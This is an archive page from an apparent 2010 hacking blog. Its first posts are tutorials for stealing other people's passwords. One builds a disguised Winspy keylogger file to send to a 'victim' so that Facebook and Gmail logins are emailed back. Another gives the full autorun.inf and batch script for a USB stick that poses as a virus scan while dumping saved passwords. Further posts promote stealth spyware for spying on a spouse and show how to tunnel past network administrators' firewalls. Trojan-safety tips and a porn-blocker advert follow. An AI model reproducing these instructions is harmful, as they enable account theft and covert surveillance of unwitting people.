Wednesday, May 26, 2010

Hack a Facebook password with winspy (Video)

I have made a couple of tutorials on winspy , but most of the people which are new to this subject failed to understand it,so therefore i am posting a video which will help you to hack a facebook password with a winspy keylogger.Winspy keylogger is a complete stealth mode spyware keylogger that will record both Local and remote computer.






Steps followed in the video:
First of all download Winspy keylogger software from link given below:

2. After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.

3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
Winspy keylogger to hack gmail account password




4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
Winspy keylogger to hack gmail passwsord




5. Now, Winspy’s main screen will be displayed as shown in image below:




6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
hack gmail password


.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.

Tuesday, May 25, 2010

How to catch a cheating spouse

Is your spouse cheating you? Do you want to catch a cheating spouse? Studies reveal that:
  • Only 46% of men believe that online affairs are adultery. (DivorceMag)
  • Up to 37% of men and 22% of women admit to having affairs. Researchers think the vast majority of the millions of people who visit chat rooms, have multiple "special friends". (Dr. Bob Lanier, askbob.com)
  • One-third of divorce litigation is caused by online affairs. (The Fortino Group)
  • Approximately 70% of time on-line is spent in chatrooms or sending e-mail; of these interactions, the vast majority are romantic in nature. (Dr. Michael Adamse, PhD., co-author of "Affairs of the Net: The Cybershrinks' Guide to Online Relationships")

IF you are in a same situation then dont worry, Rafayhackingarticles has got a solution for you:


These computer monitoring software will log and record what your spouse types, who they talk to, documents they open and print, what websites they visit, software titles they run, emails they send and receive, and even screenshots of their actual online activities.
Stop your cheating spouse in their tracks with our powerful monitoring spy software.



  RafayHackingArticles recommends following three spywares:
Remote password hacking software
Sniperspy - Remote monitoring


SniperSpy is the industry leading Remote password  hacking software combined with the remote install and  Remote Viewing feature. Once installed on the remote pc(s) you wish, you only need  to login to your own personal SniperSpy account to view  activity logs of the remote PC’s!  This means that you can  view logs of the remote PC’s from anywhere in the world as  long as you have internet access


Spytech Realtime-Spy 


Realtime-Spy is the latest in cutting-edge computer monitoring technology that allows you to monitor ANY PC from ANYWHERE. Realtime-Spy is remotely deployable (no physical installation needed), and its activity logs are accessible from anywhere - regardless if the remote PC is online or not. Once installed, Realtime-Spy monitors the remote PC in total stealth, and cloaks itself to avoid being detected. Monitors keystrokes, website visits, windows viewed, and more!


Spytech Keystroke Spy  Keystroke Spy is a cost-effective monitoring solution that  allows you to easily, and efficiently log what your computer  users are doing. Keystroke Spy is a powerful tool that can  log every keystroke users type. Keystroke Spy can run in  total stealth, email you when specific keywords are typed , and can even be set to log keystrokes only typed in specific applications.


Friday, May 21, 2010

Usb password stealer - Steal passwords on a Remote computer

Usb password stealer


As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords.



Things you will need?


MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:


Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc


IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.


Protected storage pass viewer(PSPV) Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:


Note:Kindly disable your antivirus before performing these steps


1.First of all download all 5 tools and copy the executables (.exe( files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.
Usb password stealer



After this you can see saved password in .TXT files


Hope you like it Sharing with your friends !

Thursday, May 20, 2010

How to monitor a Computer - Eurocron spy

Montir a computer
Eurocron spy is one of the best personal monitoring softwares, Even if you dont have much knowledge about computers you can still monitor your Pc with ease. This is truly a 1-minute-set-up software, that records literately every thing typed into your PC.
 

Features: 

Eurocron spy can do following things:

Records Everything - WIth Eurocron spy you can record each and every keystroke typed in your computer

Records Chats -  With Eurocron spy you can record Msn,yahoo,Gtalk etc  chats .

Website logs - You can also see what websites were visited not in your presence

and much more

Warning - Monitoring a computer without some one's permission is a crime and rafayhackingarticles is not responsible for what you do with this software

How it works?

First of all download Eurocron spy from the below link:


Then follow the steps mentioned in the video:

Tuesday, May 18, 2010

How to bypass/hack a Firewall

As we know that Firewall is a basic component for securing a network.The basic purpose of a firewall is to isolate one network from another. Firewalls are becoming available as appliances, meaning they are installed in to the network between two networks.The Hackers often bypass Antiviruses and Anti-spywares by some methods Like Crypting,Hexing, File-pumping etc,but it becomes very difficult for a Hacker to bypass a Firewall so this article will explain on what methods do Hackers use to bypass/Hack firewalls



Firewall is often called Hindrance(Obstacle) in Hacking,the following chart will show you the working of the firewall.



Bypass firewall with SSH Tunneling

The method which most Hackers use to bypass firewall is known as SSH tunneling.

What is SSH Tunneling?
Well according to wikipedia  A Secure Shell (SSH) tunnel consists of an encrypted tunnel created through an SSH protocol connection. Users may set up SSH tunnels to tunnel unencrypted traffic over a network through an encrypted channel
For more information on SSH Tunneling See it on Wikipedia Here

Why do you want to Bypass firewall?

Most network administrators at work, university or school deny access to file sharing, instant messaging or social networks such as facebook or myspace with a firewall or proxy server. If you are constantly getting a message saying "Can't connect" or something similar, the service you are trying to connect to has probably been blocked by your network administrator.

SSH Tunneling Demonstration:

Now i will demonstrate you on How to Bypass/Hack firewall using SSH Tunneling

1.The first thing you need to do is to set up an account for SSH access,There are many paid and free SSH providers listed in DMOZ directory,e.g Superprotocol.com

2.Next you need to download PUTTY.Putty is an open source SSH client.

Bypass firewall with SSH Tunneling

3.Once you have downloaded it execute it and you will be sent to the configuration page.

4.You will enter in the host name the server through which we can connect SSH access with,make sure SSH is selected using port 22.

5.Now goto Tunnels in SSH options,Here we will set up a Tunnel

6.Change Source port to 8080 and click Dynamic.


7.Once this is Done Click open.
Bypass firewall with SSH Tunneling

8.Now login in with your information you provided in the SSH Provider

9.Now you have successfully established the tunnel.

10.Now Download WireShark  and execute wireshark.

11.Now start Packet capture,it will be empty and now visit google.com from your browser you will see packets getting captured
Bypass firewall with SSH Tunneling



12.Now we will configure Mozilla firefox to use SSH connection.

13.Go to the "Tools" menu and then "Options
Bypass firewall with SSH Tunneling


14.Go to the "Advanced" button, the "Network" tab, and then click "Settings
Bypass firewall with SSH Tunneling

15.In the connection settings enter "localhost" as the "Socks Host and your port number, such as "1080" into the "Port:" field

Bypass firewall with SSH Tunneling

Now we will go back to wire shark you will see bunch of SSH connection,as you can see we no longer have information what was being sent from server to client

Newbie's will find it very difficult to do it,lots of people were complaining me that you are only posting content for newbie's what for Intermediate so this article is for all of those guys,

Notice:Please do not copy this article is you copy it kindly provide a link back to this article.Licensed under Creative common licenses

Monday, May 17, 2010

How to secure your network from Trojans

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system. 

Is trojan virus Dangerous?
The short answer is yes, and the long answer is sometimes No, because there are near a thousand different trojan horse viruses and they all will most likely alter your computer in some way or another. 

Working of Trojans!

Types of Trojans:

 

1.Remote Access Trojans

2.Password Sending Trojans

3.Keyloggers

4.Destructive Trojans

5.Denial of Service (DoS) Attack Trojans

6.Proxy/Wingate Trojans

7.FTP Trojans

8.Software Detection Killers
 
How to Get Rid of Trojans:
Here are some practical tips to avoid getting infected (again). For more general security information, please see our main security help page.
  1. NEVER download blindly from people or sites which you aren't 100% sure about. In other words, as the old saying goes, don't accept candy from strangers. If you do a lot of file downloading, it's often just a matter of time before you fall victim to a trojan.
  2. Even if the file comes from a friend, you still must be sure what the file is before opening it, because many trojans will automatically try to spread themselves to friends in an email address book or on an IRC channel. There is seldom reason for a friend to send you a file that you didn't ask for. When in doubt, ask them first, and scan the attachment with a fully updated anti-virus program.
  3. Beware of hidden file extensions! Windows by default hides the last extension of a file, so that innocuous-looking "susie.jpg" might really be "susie.jpg.exe" - an executable trojan! To reduce the chances of being tricked, unhide those pesky extensions.
  4. NEVER use features in your programs that automatically get or preview files. Those features may seem convenient, but they let anybody send you anything which is extremely reckless. For example, never turn on "auto DCC get" in mIRC, instead ALWAYS screen every single file you get manually. Likewise, disable the preview mode in Outlook and other email programs.
  5. Never blindly type commands that others tell you to type, or go to web addresses mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones). If you do so, you are potentially trusting a stranger with control over your computer, which can lead to trojan infection or other serious harm.
  6. Don't be lulled into a false sense of security just because you run anti-virus programs. Those do not protect perfectly against many viruses and trojans, even when fully up to date. Anti-virus programs should not be your front line of security, but instead they serve as a backup in case something sneaks onto your computer.
  7. Finally, don't download an executable program just to "check it out" - if it's a trojan, the first time you run it, you're already infected!

 Hope you liked the post ! Kindly give your feedback by comenting!

Wednesday, May 12, 2010

Facebook account Hacked! What to Do Now?


It would be a Nightmare for anyone whose Facebook account gets Hacked,He would wonder How to get back his Hacked Facebook account,In this article i will tell you some methods through which you can Regain your Hacked Facebook account,


Steps to take when your Facebook account gets Hacked: 

1.Reset Facebook Password with Secondary email address:
When ever you sign up for a Facebook account,they ask for your Secondary email address,In case if you loose your Password you can reset it with your Secondary email address.

2.Secret Answer:
Yes you can also reset a Facebook password with a Secret Answer which you provided to the Facebook while Signing up For a Facebook account


3.Contacting Facebook:
Lastly if Hacker has changed your Secondary Email address and Secret Question then you have only one way left i.e. Contacting Facebook team for the issue.

 Below i am also writting some ways to Protect your Facebook account from getting Hacked

Protect your Facebook account from getting Hacked:

1.Use Strong Passwords:
In order to keep your Facebook account From Getting Cracked with a Brute force,Dictionary or Rainbow tables you need to keep Strong password usually more than 10 letters or else it will be damn easy for the Hacker to Hack a Facbebook password

2.Use Phishing filter:
Phishing filter is a sheild which protects you from Fake login pages,These fake login pages are made to steal your passwords and Phishing filter will prevent you from logging into these kinds of pages


3.Use a good Antivirus and Antispyware:Yes,this is the most crucial step in all the above mentioned,It is highly recommended that you use a Good antivirus and antispyware program,I would recommend Kaspersky as an antivirus and as an spyware spyware cease and dont forget to update them regularly,Remember one trojan takes it all.


4.Use a Good antilogger:
Antilogger is a program which lets you know if a keylogger is present on your computer,Keylogger is a spyware program which helps you track of what is happening on your Computer.
Learn more about keyloggers
 

5.Use a Good Firewall:
If you want to prevent a Hacker to enter in your Computer and Hack your Facebook password than you must use a good firewall,I  personally Recommend Zonealaram firewall.Firewall is a Hindrance in Hacking,A hacker may bypass antivirus but its very difficult for a Hacker to bypass a Firewall

Hope Methods will help you to prevent your Facebook account from getting hacked,It is higly recommended that you must follow all the above Methods to ensure maximum security.

Tuesday, May 11, 2010

My Porn Blocker - Block Porn sites and Protect your Kids

Has Your Child Been Exposed to Porn?

Do you want to Protect your children from Watching Porn videos? 

The average age of first Internet exposure to pornography is 11 years old.One in five children ages 10-17 have received a sexual solicitation over the Internet.Most of the parents are worried about their Children and  Exposure to pornography can have a serious impact on children since it has the ability to easily distort the tender minds. If you are a parent, then you are most likely reading this because you are in search of a Porn Blocker to block Internet Porn.Well Below is the Porn blocker which i recommend and is used by most parents that want to Protect their Childrens to being exposed to porn

My Porn Blocker - No 1 Porn blocking software:

Porn blocker
Features of Porn blocker:

1.Block offensive content -Works behind the scenes and stops harmful websites before they appear, including newsgroups


Integration With All Search Engines-This means your children can't search on a search engine and even see links to blocked sites. This new internet safety feature enables better protection against pornographic images when doing an "image only" search.

Stop Illegal File Sharing / P2P Software-Only program on the net to block over 50 File Sharing Programs

Works with IE 5.0+, FireFox, Netscape, Opera-Smart and effective content filtering works with any and all the popular browsers!

Stealth Mode: - Run silently and completely hidden from the task bar, system tray, process list, start menu and add/remove programs section!

Block All Chats - Chat can be fun but it's also a very dangerous place where sex predators like to target kids, restrict chat effortlessly

Blocking/Limiting social Networking sites -Blocking or limited access to popular but potentially inappropriate services such as MySpace and Facebook

Automatic ScreenShots:
Secretly take high quality pictures of the screen every every x minutes and then view a handy DVD style slide show later to see everything!)

And much more!

Why Porn Blocker?
Most similar programs check ONLY the URL of the requested page against a database of supposed "indecent" addresses - and these databases have to be updated constantly. This way of porn blocking is not GUARANTEED effective because hundreds of new sites appear online every minute - YES! EVERY MINUTE.
Unlike these other programs, MyPornBlocker™ has special functions that allow specific analyzing of the page content itself. It doesn't rely on a database of URLs or suspicious sites...
It checks and double checks the actual content that is being loaded and displayed on the PC itself.

So what are you Waiting for Go and grab the best Porn blocker software Online! Just Click the below button for Download links

Download my Porn blocker